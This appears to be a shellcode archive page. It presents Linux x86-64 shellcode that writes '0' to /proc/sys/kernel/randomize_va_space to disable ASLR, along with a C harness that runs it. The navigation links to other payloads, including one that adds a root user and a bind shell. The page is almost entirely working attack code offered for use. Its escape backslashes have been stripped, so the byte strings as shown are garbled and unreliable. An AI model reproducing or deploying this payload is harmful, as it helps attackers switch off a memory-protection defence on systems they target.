[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86-64 - Disable ASLR Security - 143 bytes
# Published : 2010-06-17
# Author : Jonathan Salwan
# Previous Title : Linux/x86-64 - Add root user with password - 390 bytes
# Next Title : Polymorphic Bindport 31337 with setreuid (0,0) linux/x86
/*
Title: Linux/x86-64 - Disable ASLR Security - 143 bytes
Date: 2010-06-17
Tested: Archlinux x86_64 k2.6.33
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
Description:
============
Address space layout randomization (ASLR) is a computer security technique
which involves randomly arranging the positions of key data areas, usually
including the base of the executable and position of libraries, heap, and
stack, in a process's address space.
This shellcode disables the ASLR.
*/
#include <stdio.h>
char *SC =
/* open("/proc/sys/kernel/randomize_va_space", O_WRONLY|O_CREAT|O_APPEND, 0644) */
"x48x31xd2" // xor %rdx,%rdx
"x48xbbxffxffxffxffxffx61x63x65" // mov $0x656361ffffffffff,%rbx
"x48xc1xebx28" // shr $0x28,%rbx
"x53" // push %rbx
"x48xbbx7ax65x5fx76x61x5fx73x70" // mov $0x70735f61765f657a,%rbx
"x53" // push %rbx
"x48xbbx2fx72x61x6ex64x6fx6dx69" // mov $0x696d6f646e61722f,%rbx
"x53" // push %rbx
"x48xbbx73x2fx6bx65x72x6ex65x6c" // mov $0x6c656e72656b2f73,%rbx
"x53" // push %rbx
"x48xbbx2fx70x72x6fx63x2fx73x79" // mov $0x79732f636f72702f,%rbx
"x53" // push %rbx
"x48x89xe7" // mov %rsp,%rdi
"x66xbex41x04" // mov $0x441,%si
"x66xbaxa4x01" // mov $0x1a4,%dx
"x48x31xc0" // xor %rax,%rax
"xb0x02" // mov $0x2,%al
"x0fx05" // syscall
/* write(3, "0n", 2) */
"x48xbfxffxffxffxffxffxffxffx03" // mov $0x3ffffffffffffff,%rdi
"x48xc1xefx38" // shr $0x38,%rdi
"x48xbbxffxffxffxffxffxffx30x0a" // mov $0xa30ffffffffffff,%rbx
"x48xc1xebx30" // shr $0x30,%rbx
"x53" // push %rbx
"x48x89xe6" // mov %rsp,%rsi
"x48xbaxffxffxffxffxffxffxffx02" // mov $0x2ffffffffffffff,%rdx
"x48xc1xeax38" // shr $0x38,%rdx
"x48x31xc0" // xor %rax,%rax
"xb0x01" // mov $0x1,%al
"x0fx05" // syscall
/* _exit(0) */
"x48x31xff" // xor %rdi,%rdi
"x48x31xc0" // xor %rax,%rax
"xb0x3c" // mov $0x3c,%al
"x0fx05"; // syscall
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
return 0;
}